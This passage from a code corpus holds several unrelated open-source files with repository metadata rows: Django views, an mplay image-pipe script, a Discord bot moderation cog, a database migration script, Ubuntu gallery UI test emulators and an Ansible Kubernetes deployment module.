return reverse('messages_per_writeitinstance', subdomain=self.request.subdomain)
class ContactUsView(TemplateView):
template_name = 'nuntium/profiles/contact.html'
class WelcomeView(DetailView):
model = WriteItInstance
template_name = 'nuntium/profiles/welcome.html'
@method_decorator(login_required)
def dispatch(self, request, *args, **kwargs):
self.kwargs['slug'] = request.subdomain
return super(WelcomeView, self).dispatch(request, *args, **kwargs)
def get_context_data(self, **kwargs):
context = super(WelcomeView, self).get_context_data(**kwargs)
# passing URLs in for easy insertion into the translation tags
# because we're using an overridden version of the url tag that
# doesn't allow the use of "as" to pass the url as a variable
# that can be quoted within a translation block. *sigh*
context['url_template_update'] = reverse('writeitinstance_template_update', subdomain=self.request.subdomain)
context['url_basic_update'] = reverse('writeitinstance_basic_update', subdomain=self.request.subdomain)
context['url_maxrecipients_update'] = reverse('writeitinstance_maxrecipients_update', subdomain=self.request.subdomain)
context['url_answernotification_update'] = reverse('writeitinstance_answernotification_update', subdomain=self.request.subdomain)
context['url_recipients'] = reverse('contacts-per-writeitinstance', subdomain=self.request.subdomain)
context['url_data_sources'] = reverse('relate-writeit-popit', subdomain=self.request.subdomain)
return context
class WriteItInstanceWebHooksView(WriteItInstanceDetailBaseView):
template_name = 'nuntium/profiles/webhooks.html'
def get_context_data(self, *args, **kwargs):
context = super(WriteItInstanceWebHooksView, self).get_context_data(*args, **kwargs)
context['form'] = WebhookCreateForm(writeitinstance=self.object)
return context
class WriteItInstanceCreateWebHooksView(CreateView):
model = AnswerWebHook
form_class = WebhookCreateForm
@method_decorator(login_required)
def dispatch(self, request, *args, **kwargs):
self.kwargs['slug'] = request.subdomain
self.writeitinstance = get_object_or_404(WriteItInstance,
slug=self.kwargs['slug'],
owner=self.request.user)
return super(WriteItInstanceCreateWebHooksView, self).dispatch(request, *args, **kwargs)
def get_form_kwargs(self):
kwargs = super(WriteItInstanceCreateWebHooksView, self).get_form_kwargs()
kwargs['writeitinstance'] = self.writeitinstance
return kwargs
def get_success_url(self):
return reverse(
'writeitinstance_webhooks',
subdomain=self.writeitinstance.slug,
)
| gpl-3.0 | 4,677,099,118,318,445,000 | 36.417169 | 137 | 0.692413 | false | 4.002739 | false | false | false |
cinepost/Copperfield_FX | copper/shout/drivers/refined.py | 1 | 2799 | #!/usr/bin/env python
#
# This program shows how to write data to mplay by writing data to the
# imdisplay program using a pipe.
#
# This program uses the -k option on imdisplay to perform progressive
# refinement when rendering an image. The image is quite simple.
#
# Notes:
# This uses the simple format (no deep rasters)
# It only writes 8-bit data
#
import os, struct, time
MAGIC = (ord('h')<<24) + (ord('M')<<16) + (ord('P')<<8) + ord('0')
DATASIZE = 1 # See .c file for meaning
NCHANNELS = 4 # See .c file for meaning
EO_IMAGE = -2 # End of image marker
RES = 256
COLORS = [
(0, 0, 0, 255),
(255, 0, 0, 255),
(0, 255, 0, 255),
(0, 0, 255, 255),
(255, 255, 0, 255),
(0, 255, 255, 255),
(255, 0, 255, 255),
(255, 255, 255, 255),
]
def quadrant(x, y):
# Determine which quadrant color to use
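    # (Note: the comparisons pack into an index 4*(x > y) + 2*(x > RES/2) + (y > RES/2),
    # selecting one of the eight entries in COLORS.)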
n = (x > y) * 4
n += (x > RES/2) * 2
n += (y > RES/2)
return n
class MPlay:
def __init__(self, xres, yres, name="Test Application"):
self.XRES = xres
self.YRES = yres
# Open a pipe to imdisplay
# -p tells imdisplay to read the data from the pipe
# -k tells imdisplay to keep reading data after the image has
# been fully written
self.fp = os.popen('imdisplay -p -k -n "%s"' % name, 'w')
# The header is documented in the C code examples
header = struct.pack('I'*8, MAGIC, xres, yres, DATASIZE,
NCHANNELS, 0, 0, 0)
self.fp.write(header)
def close(self):
# To tell imdisplay that the image has been finished, we send a special
# header.
header = struct.pack('iiii', EO_IMAGE, 0, 0, 0)
self.fp.write(header)
self.fp.close()
self.fp = None
def writeTile(self, x0, x1, y0, y1, clr):
# The tile header is documented in the c code.
header = struct.pack('IIII', x0, x1, y0, y1)
self.fp.write(header)
# The tile's bounds are inclusive, so to find the number of pixels we
# need to add one to each dimension.
size = (x1 - x0 + 1) * (y1 - y0 + 1)
pixel = struct.pack('BBBB', clr[0], clr[1], clr[2], clr[3])
# Write a bunch of pixel data
self.fp.write(pixel * size)
def render(self, step):
for y in range(0, self.XRES, step):
for x in range(0, self.YRES, step):
self.writeTile(x, x+step-1, y, y+step-1, COLORS[quadrant(x, y)])
def main():
mp = MPlay(RES, RES)
mp.writeTile(0, RES-1, 0, RES-1, (255, 128, 64, 255))
step = 64
while step > 0:
time.sleep(.5) # Let mplay update the latest image we wrote
mp.render(step)
step /= 2
mp.close()
if __name__ == '__main__':
main()
| unlicense | -7,526,381,331,422,434,000 | 30.1 | 80 | 0.554484 | false | 3.089404 | false | false | false |
corpnewt/CorpBot.py | Cogs/BotAdmin.py | 1 | 12950 | import asyncio, discord, re, random
from operator import itemgetter
from discord.ext import commands
from Cogs import Utils, DisplayName, Message, PickList
def setup(bot):
# Add the bot and deps
settings = bot.get_cog("Settings")
bot.add_cog(BotAdmin(bot, settings))
class BotAdmin(commands.Cog):
# Init with the bot reference, and a reference to the settings var
def __init__(self, bot, settings):
self.bot = bot
self.settings = settings
self.dregex = re.compile(r"(?i)(discord(\.gg|app\.com)\/)(?!attachments)([^\s]+)")
self.mention_re = re.compile(r"[0-9]{17,21}")
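        # dregex matches discord.gg/... and discordapp.com/... invite links (excluding
        # /attachments URLs); mention_re matches 17-21 digit snowflake IDs in mentions.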
global Utils, DisplayName
Utils = self.bot.get_cog("Utils")
DisplayName = self.bot.get_cog("DisplayName")
async def message(self, message):
# Check for discord invite links and remove them if found - per server settings
if not self.dregex.search(message.content): return None # No invite in the passed message - nothing to do
# Got an invite - let's see if we care
if not self.settings.getServerStat(message.guild,"RemoveInviteLinks",False): return None # We don't care
# We *do* care, let's see if the author is admin/bot-admin as they'd have power to post invites
ctx = await self.bot.get_context(message)
if Utils.is_bot_admin(ctx): return None # We are immune!
# At this point - we need to delete the message
return { 'Ignore' : True, 'Delete' : True}
@commands.command(pass_context=True)
async def removeinvitelinks(self, ctx, *, yes_no = None):
"""Enables/Disables auto-deleting discord invite links in chat (bot-admin only)."""
if not await Utils.is_bot_admin_reply(ctx): return
await ctx.send(Utils.yes_no_setting(ctx,"Remove discord invite links","RemoveInviteLinks",yes_no))
@commands.command(pass_context=True)
async def setuserparts(self, ctx, member : discord.Member = None, *, parts : str = None):
"""Set another user's parts list (owner only)."""
# Only allow owner
isOwner = self.settings.isOwner(ctx.author)
if isOwner == None:
msg = 'I have not been claimed, *yet*.'
return await ctx.send(msg)
elif isOwner == False:
msg = 'You are not the *true* owner of me. Only the rightful owner can use this command.'
return await ctx.send(msg)
if member == None:
msg = 'Usage: `{}setuserparts [member] "[parts text]"`'.format(ctx.prefix)
return await ctx.send(msg)
if type(member) is str:
try:
member = discord.utils.get(ctx.guild.members, name=member)
except:
return await ctx.send("That member does not exist")
if not parts:
parts = ""
self.settings.setGlobalUserStat(member, "Parts", parts)
msg = '*{}\'s* parts have been set to:\n{}'.format(DisplayName.name(member), parts)
await ctx.send(Utils.suppressed(ctx,msg))
@setuserparts.error
    async def setuserparts_error(self, ctx, error):
# do stuff
msg = 'setuserparts Error: {}'.format(error)
await ctx.send(msg)
@commands.command(pass_context=True)
async def ignore(self, ctx, *, member = None):
"""Adds a member to the bot's "ignore" list (bot-admin only)."""
if not await Utils.is_bot_admin_reply(ctx): return
if member == None:
msg = 'Usage: `{}ignore [member]`'.format(ctx.prefix)
return await ctx.send(msg)
if type(member) is str:
memberName = member
member = DisplayName.memberForName(memberName, ctx.guild)
if not member:
msg = 'I couldn\'t find *{}*...'.format(memberName)
return await ctx.send(Utils.suppressed(ctx,msg))
ignoreList = self.settings.getServerStat(ctx.guild, "IgnoredUsers")
for user in ignoreList:
if str(member.id) == str(user["ID"]):
# Found our user - already ignored
return await ctx.send('*{}* is already being ignored.'.format(DisplayName.name(member)))
# Let's ignore someone
ignoreList.append({ "Name" : member.name, "ID" : member.id })
self.settings.setServerStat(ctx.guild, "IgnoredUsers", ignoreList)
await ctx.send('*{}* is now being ignored.'.format(DisplayName.name(member)))
@ignore.error
    async def ignore_error(self, ctx, error):
# do stuff
msg = 'ignore Error: {}'.format(error)
await ctx.send(msg)
@commands.command(pass_context=True)
async def listen(self, ctx, *, member = None):
"""Removes a member from the bot's "ignore" list (bot-admin only)."""
if not await Utils.is_bot_admin_reply(ctx): return
if member == None:
return await ctx.send('Usage: `{}listen [member]`'.format(ctx.prefix))
if type(member) is str:
memberName = member
member = DisplayName.memberForName(memberName, ctx.guild)
if not member:
msg = 'I couldn\'t find *{}*...'.format(memberName)
return await ctx.send(Utils.suppressed(ctx,msg))
ignoreList = self.settings.getServerStat(ctx.guild, "IgnoredUsers")
for user in ignoreList:
if str(member.id) == str(user["ID"]):
# Found our user - already ignored
ignoreList.remove(user)
self.settings.setServerStat(ctx.guild, "IgnoredUsers", ignoreList)
return await ctx.send("*{}* is no longer being ignored.".format(DisplayName.name(member)))
await ctx.send('*{}* wasn\'t being ignored...'.format(DisplayName.name(member)))
@listen.error
    async def listen_error(self, ctx, error):
# do stuff
msg = 'listen Error: {}'.format(error)
await ctx.send(msg)
@commands.command(pass_context=True)
async def ignored(self, ctx):
"""Lists the users currently being ignored."""
ignoreArray = self.settings.getServerStat(ctx.guild, "IgnoredUsers")
promoSorted = sorted(ignoreArray, key=itemgetter('Name'))
if not len(promoSorted):
return await ctx.send("I'm not currently ignoring anyone.")
ignored = ["*{}*".format(DisplayName.name(ctx.guild.get_member(int(x["ID"])))) for x in promoSorted if ctx.guild.get_member(int(x["ID"]))]
await ctx.send("Currently Ignored Users:\n{}".format("\n".join(ignored)))
async def kick_ban(self, ctx, members_and_reason = None, command_name = "kick"):
# Helper method to handle the lifting for kick and ban
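        # It collects space-delimited mentions/IDs until the first non-mention token (the
        # remainder becomes the reason), skips the bot, the caller and other bot-admins,
        # then asks the caller to type a random 4-digit code before applying
        # guild.kick/ban/unban to each confirmed target.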
if not await Utils.is_bot_admin_reply(ctx): return
if not members_and_reason:
return await ctx.send('Usage: `{}{} [space delimited member mention/id] [reason]`'.format(ctx.prefix, command_name))
# Force a mention - we don't want any ambiguity
args = members_and_reason.split()
# Get our list of targets
targets = []
missed = []
unable = []
reason = ""
for index,item in enumerate(args):
if self.mention_re.search(item): # Check if it's a mention
# Resolve the member
mem_id = int(re.sub(r'\W+', '', item))
member = ctx.guild.get_member(mem_id)
if member is None and command_name in ("ban","unban"): # Didn't get a valid member, let's allow a pre-ban/unban if we can resolve them
try: member = await self.bot.fetch_user(mem_id)
except: pass
# If we have an invalid mention, save it to report later
if member is None:
missed.append(str(mem_id))
continue
# Let's check if we have a valid member and make sure it's not:
# 1. The bot, 2. The command caller, 3. Another bot-admin/admin
if isinstance(member, discord.Member) and (member.id == self.bot.user.id or member.id == ctx.author.id or Utils.is_bot_admin(ctx,member)):
unable.append(member.mention)
continue
if not member in targets: targets.append(member) # Only add them if we don't already have them
else:
# Not a mention - must be the reason, dump the rest of the items into a string
# separated by a space
reason = " ".join(args[index:])
break
reason = reason if len(reason) else "No reason provided."
if not len(targets):
msg = "**With reason:**\n\n{}".format(reason)
if len(unable): msg = "**Unable to {}:**\n\n{}\n\n".format(command_name,"\n".join(unable)) + msg
if len(missed): msg = "**Unmatched ID{}:**\n\n{}\n\n".format("" if len(missed) == 1 else "s","\n".join(missed)) + msg
return await Message.EmbedText(title="No valid members passed!",description=msg,color=ctx.author).send(ctx)
# We should have a list of targets, and the reason - let's list them for confirmation
# then generate a 4-digit confirmation code that the original requestor needs to confirm
# in order to follow through
confirmation_code = "".join([str(random.randint(0,9)) for x in range(4)])
msg = "**To {} the following member{}:**\n\n{}\n\n**With reason:**\n\n\"{}\"\n\n**Please type:**\n\n`{}`{}{}".format(
command_name,
"" if len(targets) == 1 else "s",
"\n".join([x.name+"#"+x.discriminator for x in targets]),
reason if len(reason) else "None",
confirmation_code,
"" if not len(missed) else "\n\n**Unmatched ID{}:**\n\n{}".format("" if len(missed) == 1 else "s", "\n".join(missed)),
"" if not len(unable) else "\n\n**Unable to {}:**\n\n{}".format(command_name,"\n".join(unable))
)
confirmation_message = await Message.EmbedText(title="{} Confirmation".format(command_name.capitalize()),description=msg,color=ctx.author).send(ctx)
def check_confirmation(message):
return message.channel == ctx.channel and ctx.author == message.author # Just making sure it's the same user/channel
try: confirmation_user = await self.bot.wait_for('message', timeout=60, check=check_confirmation)
except: confirmation_user = ""
# Delete the confirmation message
await confirmation_message.delete()
# Verify the confirmation
if not confirmation_user.content == confirmation_code: return await ctx.send("{} cancelled!".format(command_name.capitalize()))
# We got the authorization!
message = await Message.EmbedText(title="{}ing...".format("Bann" if command_name == "ban" else "Unbann" if command_name == "unban" else "Kick"),color=ctx.author).send(ctx)
canned = []
cant = []
command = {"ban":ctx.guild.ban,"kick":ctx.guild.kick,"unban":ctx.guild.unban}.get(command_name.lower(),ctx.guild.kick)
for target in targets:
try:
await command(target,reason="{}#{}: {}".format(ctx.author.name,ctx.author.discriminator,reason))
canned.append(target)
except: cant.append(target)
msg = ""
if len(canned):
msg += "**I was ABLE to {}:**\n\n{}\n\n".format(command_name,"\n".join([x.name+"#"+x.discriminator for x in canned]))
if len(cant):
msg += "**I was UNABLE to {}:**\n\n{}\n\n".format(command_name,"\n".join([x.name+"#"+x.discriminator for x in cant]))
await Message.EmbedText(title="{} Results".format(command_name.capitalize()),description=msg).edit(ctx,message)
@commands.command(pass_context=True)
async def kick(self, ctx, *, members = None, reason = None):
"""Kicks the passed members for the specified reason.
All kick targets must be mentions or ids to avoid ambiguity (bot-admin only).
eg: $kick @user1#1234 @user2#5678 @user3#9012 for spamming"""
await self.kick_ban(ctx,members,"kick")
@commands.command(pass_context=True)
async def ban(self, ctx, *, members = None, reason = None):
"""Bans the passed members for the specified reason.
All ban targets must be mentions or ids to avoid ambiguity (bot-admin only).
eg: $ban @user1#1234 @user2#5678 @user3#9012 for spamming"""
await self.kick_ban(ctx,members,"ban")
@commands.command(pass_context=True)
async def unban(self, ctx, *, members = None, reason = None):
"""Unbans the passed members for the specified reason.
All unban targets must be mentions or ids to avoid ambiguity (bot-admin only).
eg: $unban @user1#1234 @user2#5678 @user3#9012 because we're nice"""
await self.kick_ban(ctx,members,"unban")
@commands.command()
async def banned(self, ctx, *, user_id = None):
"""Queries the guild's ban list for the passed user id and responds with whether they've been banned and the reason (bot-admin only)."""
if not await Utils.is_bot_admin_reply(ctx): return
try: all_bans = await ctx.guild.bans()
except: return await ctx.send("I couldn't get the ban list :(")
if not len(all_bans): return await Message.EmbedText(title="Ban List",description="No bans found",color=ctx.author).send(ctx)
orig_user = user_id
try: user_id = int(user_id) if user_id != None else None
except: user_id = -1 # Use -1 to indicate unresolved
entries = []
for ban in all_bans:
entries.append({"name":"{}#{} ({})".format(ban.user.name,ban.user.discriminator,ban.user.id),"value":ban.reason if ban.reason else "No reason provided"})
if user_id != None and user_id == ban.user.id:
# Got a match - display it
return await Message.Embed(
title="Ban Found For {}".format(user_id),
fields=[entries[-1]], # Send the last found entry
color=ctx.author
).send(ctx)
return await PickList.PagePicker(title="Ban List ({:,} total)".format(len(entries)),description=None if user_id == None else "No match found for '{}'.".format(orig_user),list=entries,ctx=ctx).pick()
| mit | 2,491,016,822,418,353,700 | 43.759717 | 200 | 0.669035 | false | 3.229426 | false | false | false |
proyectosdeley/proyectos_de_ley | migrate_db.py | 1 | 2327 | import dataset
import datetime
import os
import unicodedata
def convert_name_to_slug(name):
"""Takes a congresista name and returns its slug."""
name = name.replace(",", "").lower()
name = name.split(" ")
    if len(name) > 2:
        i = 0
        slug = ""
        while i < 3:
            slug += name[i]
            if i < 2:
                slug += "_"
            i += 1
    else:
        # Short names would otherwise leave `slug` undefined below.
        slug = "_".join(name)
slug = unicodedata.normalize('NFKD', slug).encode('ascii', 'ignore')
slug = str(slug, encoding="utf-8")
return slug + "/"
old_db = os.path.join("..", "leyes.db")
new_db = "leyes_sqlite3.db"
db = dataset.connect("sqlite:///" + old_db)
res = db.query("select * from proyectos")
new_items = []
slugs = [] # translation table between name an URL
for i in res:
timestamp = datetime.datetime.fromtimestamp(i['timestamp'])
i['time_created'] = timestamp
i['time_edited'] = timestamp
try:
fecha_presentacion = datetime.datetime.strptime(
i['fecha_presentacion'],
'%d/%m/%Y',
)
except ValueError:
fecha_presentacion = datetime.datetime.strptime(
i['fecha_presentacion'],
'%d/%m/%y',
)
fecha_presentacion = datetime.datetime.date(fecha_presentacion)
i['fecha_presentacion'] = fecha_presentacion
i['expediente'] = i['link_to_pdf']
if i['pdf_url'] is None:
i['pdf_url'] = ''
if i['seguimiento_page'] is None:
i['seguimiento_page'] = ''
del i['link_to_pdf']
del i['timestamp']
del i['id']
del i['link']
congresistas = i['congresistas'].split(';')
for congre in congresistas:
congre = congre.strip()
obj = dict(nombre=congre)
if congre is not None and congre.strip() != '':
congre_slug = convert_name_to_slug(congre)
obj['slug'] = congre_slug
if obj not in slugs and congre_slug is not None:
slugs.append(obj)
new_items.append(i)
db = dataset.connect("sqlite:///" + new_db)
table = db['pdl_proyecto']
table.insert_many(new_items)
table = db['pdl_slug']
table.insert_many(slugs)
# fix domain from example.com to proyectosdeley.pe
table = db['django_site']
table.update(dict(id=1, domain='proyectosdeley.pe', name='proyectosdeley.pe'),
['id']
)
| mit | -3,755,114,459,877,640,000 | 25.443182 | 78 | 0.568973 | false | 3.236439 | false | false | false |
ubports-weblate/gallery-app | tests/autopilot/gallery_app/emulators/photo_viewer.py | 1 | 9588 | # -*- Mode: Python; coding: utf-8; indent-tabs-mode: nil; tab-width: 4 -*-
# Copyright 2012-2015 Canonical
#
# This program is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License version 3, as published
# by the Free Software Foundation.
import logging
from autopilot.introspection.dbus import StateNotFoundError
import autopilot.logging
import ubuntuuitoolkit
from gallery_app.emulators import main_screen
from gallery_app.emulators.gallery_utils import(
GalleryAppException,
GalleryUtils
)
logger = logging.getLogger(__name__)
class PopupPhotoViewer(ubuntuuitoolkit.UbuntuUIToolkitCustomProxyObjectBase):
def _get_header(self):
main = self.get_root_instance().select_single(main_screen.MainScreen)
return main.select_single('PageHeader',
objectName='photoViewerHeader')
def _open_overflow(self):
overflow_button = self._get_header().select_single(
objectName='overflow_action_button')
self.pointing_device.click_object(overflow_button)
return self.get_root_instance().wait_select_single(
objectName='actions_overflow_panel',
visible=True)
def click_action_button(self, action_object_name):
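        # Clicks a named action in the photo viewer header; if the header is hidden it is
        # revealed first, and if the button is not in the header it is looked up in the
        # overflow panel instead.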
header = self._get_header()
if not header.visible:
main = self.get_root_instance().select_single(
main_screen.MainScreen)
x, y, w, h = main.globalRect
self.pointing_device.move(x + (w // 2), y + (h // 2))
self.pointing_device.click()
header.visible.wait_for(True)
try:
object_name = action_object_name + "_button"
button = header.select_single(objectName=object_name)
self.pointing_device.click_object(button)
except StateNotFoundError:
object_name = action_object_name + "_button"
popover = self._open_overflow()
button = popover.select_single(objectName=object_name)
self.pointing_device.click_object(button)
@autopilot.logging.log_action(logger.info)
def delete_current_photo(self, confirm=True):
self.click_action_button("deleteButton")
if confirm:
self.confirm_delete_photo()
else:
self.cancel_delete_photo()
@autopilot.logging.log_action(logger.debug)
def confirm_delete_photo(self):
self._click_delete_dialog_button("Yes")
def _click_delete_dialog_button(self, name):
delete_dialog = self._get_delete_dialog()
button = delete_dialog.wait_select_single(
"Button", objectName="deletePhotoDialog" + name, visible=True)
self.pointing_device.click_object(button)
delete_dialog.wait_until_destroyed()
def _get_delete_dialog(self):
delete_dialog = self.get_root_instance().wait_select_single(
objectName="deletePhotoDialog")
delete_dialog.visible.wait_for(True)
delete_dialog.opacity.wait_for(1)
return delete_dialog
@autopilot.logging.log_action(logger.debug)
def cancel_delete_photo(self):
self._click_delete_dialog_button('No')
class PhotoViewer(GalleryUtils):
def __init__(self, app):
super(PhotoViewer, self).__init__(self)
self.app = app
def get_popup_album_picker(self):
"""Returns the photo viewer album pickers."""
return self.app.wait_select_single("PopupAlbumPicker",
objectName="popupAlbumPicker")
def get_share_peer_picker(self):
"""Returns the photo viewer share picker."""
return self.app.wait_select_single(objectName="sharePicker",
visible=True)
def get_photo_editor(self):
"""Returns the photo edit dialog."""
return self.app.wait_select_single("PhotoEditor")
def get_revert_to_original_dialog(self):
"""Returns the revert to original dialog."""
return self.app.wait_select_single("Dialog",
objectName="revertPromptDialog")
def get_cancel_revert_to_original_button(self):
"""Returns the revert to original cancel button."""
return self.get_revert_to_original_dialog().wait_select_single(
"Button",
objectName="cancelRevertButton",
visible=True)
def get_confirm_revert_to_original_button(self):
"""Returns the revert to original confirm button."""
return self.get_revert_to_original_dialog().wait_select_single(
"Button",
objectName="confirmRevertButton",
visible=True)
def get_photo_component(self):
# Was using a list index (lp:1247711). Still needs fixing, I'm not
# convinced this is a suitable way to select the correct item.
return self.app.wait_select_single(
"SingleMediaViewer",
objectName="openedMedia0"
)
def get_photos_list(self):
return self.app.wait_select_single("MediaListView")
def get_editor_actions_bar(self):
"""Returns the actions bar for the editor."""
return self.app.select_single("ActionsBar",
objectName="editorActionsBar")
def get_editor_action_button_by_text(self, button_text):
"""Returns the action button from the editor by text."""
actions_bar = self.get_editor_actions_bar()
buttons = actions_bar.select_many('AbstractButton')
for button in buttons:
if str(button.text) == button_text:
return button
raise GalleryAppException(
'Editor action button {} could not be found'.format(button_text))
def get_crop_action_button(self):
"""Returns the crop item of the edit dialog."""
return self.get_editor_action_button_by_text("Crop")
def get_rotate_action_button(self):
"""Returns the rotate item of the edit dialog."""
return self.get_editor_action_button_by_text("Rotate")
def get_undo_menu_item(self):
"""Returns the undo item of the edit dialog."""
return self.app.select_single("Standard", objectName="undoListItem")
def get_redo_menu_item(self):
"""Returns the redo item of the edit dialog."""
return self.app.select_single("Standard", objectName="redoListItem")
def get_revert_action_button(self):
"""Returns the revert to original menu item in the edit dialog."""
return self.get_editor_action_button_by_text("Revert to Original")
def get_auto_enhance_menu_item(self):
"""Returns the 'auto enhance' menu item in the edit dialog."""
return self.app.select_single("Standard", objectName='enhanceListItem')
def get_delete_popover_cancel_item(self):
"""Returns the cancel button of the delete popover."""
return self.app.wait_select_single("Button",
objectName="deletePhotoDialogNo",
visible=True)
def get_opened_photo(self):
"""Returns the first opened photo."""
return self.app.wait_select_single("SingleMediaViewer",
objectName="openedMedia0")
def get_crop_interactor(self):
"""Returns the crop interactor."""
return self.app.wait_select_single("CropInteractor",
objectName="cropInteractor")
def get_crop_overlay(self):
"""Returns the crop overlay."""
return self.app.wait_select_single("CropOverlay",
objectName="cropOverlay")
def get_top_left_crop_corner(self):
"""Returns the top left corner of the crop overlay for dragging."""
return self.app.wait_select_single("CropCorner",
objectName="topLeftCropCorner")
def get_crop_overlays_crop_icon(self):
"""Returns the crop icon of the crop overlay."""
return self.app.wait_select_single("Button",
objectName="centerCropIcon",
visible=True)
def get_edit_preview(self):
"""Returns the edit preview."""
return self.app.wait_select_single("EditPreview",
objectName="editPreview")
def _click_item(self, item):
self.pointing_device.click_object(item)
def click_rotate_button(self):
rotate_item = self.get_rotate_action_button()
self._click_item(rotate_item)
def click_crop_button(self):
crop_item = self.get_crop_action_button()
self._click_item(crop_item)
def click_undo_item(self):
undo_item = self.get_undo_menu_item()
self._click_item(undo_item)
def click_redo_item(self):
redo_item = self.get_redo_menu_item()
self._click_item(redo_item)
def click_revert_button(self):
revert_item = self.get_revert_action_button()
self._click_item(revert_item)
def click_cancel_revert_button(self):
cancel_item = self.get_cancel_revert_to_original_button()
self._click_item(cancel_item)
def click_confirm_revert_button(self):
confirm_item = self.get_confirm_revert_to_original_button()
self._click_item(confirm_item)
def click_enhance_item(self):
enhance_item = self.get_auto_enhance_menu_item()
self._click_item(enhance_item)
| gpl-3.0 | -9,074,009,003,350,327,000 | 37.66129 | 79 | 0.61577 | false | 4.074798 | false | false | false |
emonty/ansible-container | ansible_container/shipit/modules/k8s_deployment.py | 1 | 9208 | #!/usr/bin/python
#
# Copyright 2016 Red Hat | Ansible
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
module: k8s_deployment
short_description: Start, cancel or retry a deployment on a Kubernetes or OpenShift cluster.
description:
- Start, cancel or retry a deployment on a Kubernetes or OpenShift cluster by setting the C(state) to I(present) or
I(absent).
- Supports check mode. Use check mode to view a list of actions the module will take.
options:
'''
EXAMPLES = '''
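# Illustrative usage only - the values below are assumptions based on this module's
# argument spec, not examples taken from project documentation.
- name: Deploy the example web container
  k8s_deployment:
    project_name: example-project
    deployment_name: example-web
    replicas: 2
    containers:
      - name: example-web
        image: registry.example.com/example-web:latest
        ports:
          - 8080
    state: present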
'''
RETURN = '''
'''
import logging
import logging.config
from ansible.module_utils.basic import *
from ansible_container.shipit.k8s_api import K8sApi
from ansible_container.shipit.exceptions import ShipItException
logger = logging.getLogger('k8s_deployment')
LOGGING = (
{
'version': 1,
'disable_existing_loggers': True,
'handlers': {
'null': {
'level': 'DEBUG',
'class': 'logging.NullHandler',
},
'file': {
'level': 'DEBUG',
'class': 'logging.FileHandler',
'filename': 'ansible-container.log'
}
},
'loggers': {
'k8s_deployment': {
'handlers': ['file'],
'level': 'INFO',
},
'container': {
'handlers': ['file'],
'level': 'INFO',
},
'compose': {
'handlers': [],
'level': 'INFO'
},
'docker': {
'handlers': [],
'level': 'INFO'
}
},
}
)
class K8SDeploymentManager(AnsibleModule):
def __init__(self):
self.arg_spec = dict(
project_name=dict(type='str', aliases=['namespace'], required=True),
state=dict(type='str', choices=['present', 'absent'], default='present'),
labels=dict(type='dict'),
deployment_name=dict(type='str'),
recreate=dict(type='bool', default=False),
replace=dict(type='bool', default=True),
selector=dict(type='dict'),
replicas=dict(type='int', default=1),
containers=dict(type='list'),
strategy=dict(type='str', default='Rolling', choices=['Recreate', 'Rolling']),
cli=dict(type='str', choices=['kubectl', 'oc'], default='oc'),
debug=dict(type='bool', default=False)
)
super(K8SDeploymentManager, self).__init__(self.arg_spec,
supports_check_mode=True)
self.project_name = None
self.state = None
self.labels = None
self.ports = None
self.deployment_name = None
self.selector = None
self.replace = None
self.replicas = None
self.containers = None
self.strategy = None
self.recreate = None
self.cli = None
self.api = None
self.debug = None
def exec_module(self):
for key in self.arg_spec:
setattr(self, key, self.params.get(key))
if self.debug:
LOGGING['loggers']['container']['level'] = 'DEBUG'
LOGGING['loggers']['k8s_deployment']['level'] = 'DEBUG'
logging.config.dictConfig(LOGGING)
self.api = K8sApi(target=self.cli)
actions = []
changed = False
deployments = dict()
results = dict()
try:
project_switch = self.api.set_project(self.project_name)
except ShipItException as exc:
self.fail_json(msg=exc.message, stderr=exc.stderr, stdout=exc.stdout)
if not project_switch:
actions.append("Create project %s" % self.project_name)
if not self.check_mode:
try:
self.api.create_project(self.project_name)
except ShipItException as exc:
self.fail_json(msg=exc.message, stderr=exc.stderr, stdout=exc.stdout)
if self.state == 'present':
deployment = self.api.get_resource('dc', self.deployment_name)
if not deployment:
template = self._create_template()
changed = True
actions.append("Create deployment %s" % self.deployment_name)
if not self.check_mode:
try:
self.api.create_from_template(template=template)
except ShipItException as exc:
self.fail_json(msg=exc.message, stderr=exc.stderr, stdout=exc.stdout)
elif deployment and self.recreate:
actions.append("Delete deployment %s" % self.deployment_name)
changed = True
template = self._create_template()
if not self.check_mode:
try:
self.api.delete_resource('dc', self.deployment_name)
self.api.create_from_template(template=template)
except ShipItException as exc:
self.fail_json(msg=exc.message, stderr=exc.stderr, stdout=exc.stdout)
elif deployment and self.replace:
template = self._create_template()
try:
template['status'] = dict(latestVersion=deployment['status']['latestVersion'] + 1)
except Exception as exc:
self.fail_json(msg="Failed to increment latestVersion for %s - %s" % (self.deployment_name,
str(exc)))
changed = True
actions.append("Update deployment %s" % self.deployment_name)
if not self.check_mode:
try:
self.api.replace_from_template(template=template)
except ShipItException as exc:
self.fail_json(msg=exc.message, stderr=exc.stderr, stdout=exc.stdout)
deployments[self.deployment_name.replace('-', '_') + '_deployment'] = self.api.get_resource('dc', self.deployment_name)
elif self.state == 'absent':
if self.api.get_resource('deployment', self.deployment_name):
changed = True
actions.append("Delete deployment %s" % self.deployment_name)
                if not self.check_mode:
try:
self.api.delete_resource('deployment', self.deployment_name)
except ShipItException as exc:
self.fail_json(msg=exc.message, stderr=exc.stderr, stdout=exc.stdout)
results['changed'] = changed
if self.check_mode:
results['actions'] = actions
if deployments:
results['ansible_facts'] = deployments
return results
def _create_template(self):
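        # Builds a v1 DeploymentConfig manifest from the module parameters; container
        # env dicts and port lists are normalized into the list forms the API expects.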
for container in self.containers:
if container.get('env'):
container['env'] = self._env_to_list(container['env'])
if container.get('ports'):
container['ports'] = self._port_to_container_ports(container['ports'])
template = dict(
apiVersion="v1",
kind="DeploymentConfig",
metadata=dict(
name=self.deployment_name,
),
spec=dict(
template=dict(
metadata=dict(),
spec=dict(
containers=self.containers
)
),
replicas=self.replicas,
strategy=dict(
type=self.strategy,
),
)
)
if self.labels:
template['metadata']['labels'] = self.labels
template['spec']['template']['metadata']['labels'] = self.labels
if self.selector:
template['spec']['selector'] = self.selector
return template
def _env_to_list(self, env_variables):
result = []
for name, value in env_variables.items():
result.append(dict(
name=name,
value=value
))
return result
@staticmethod
def _port_to_container_ports(ports):
result = []
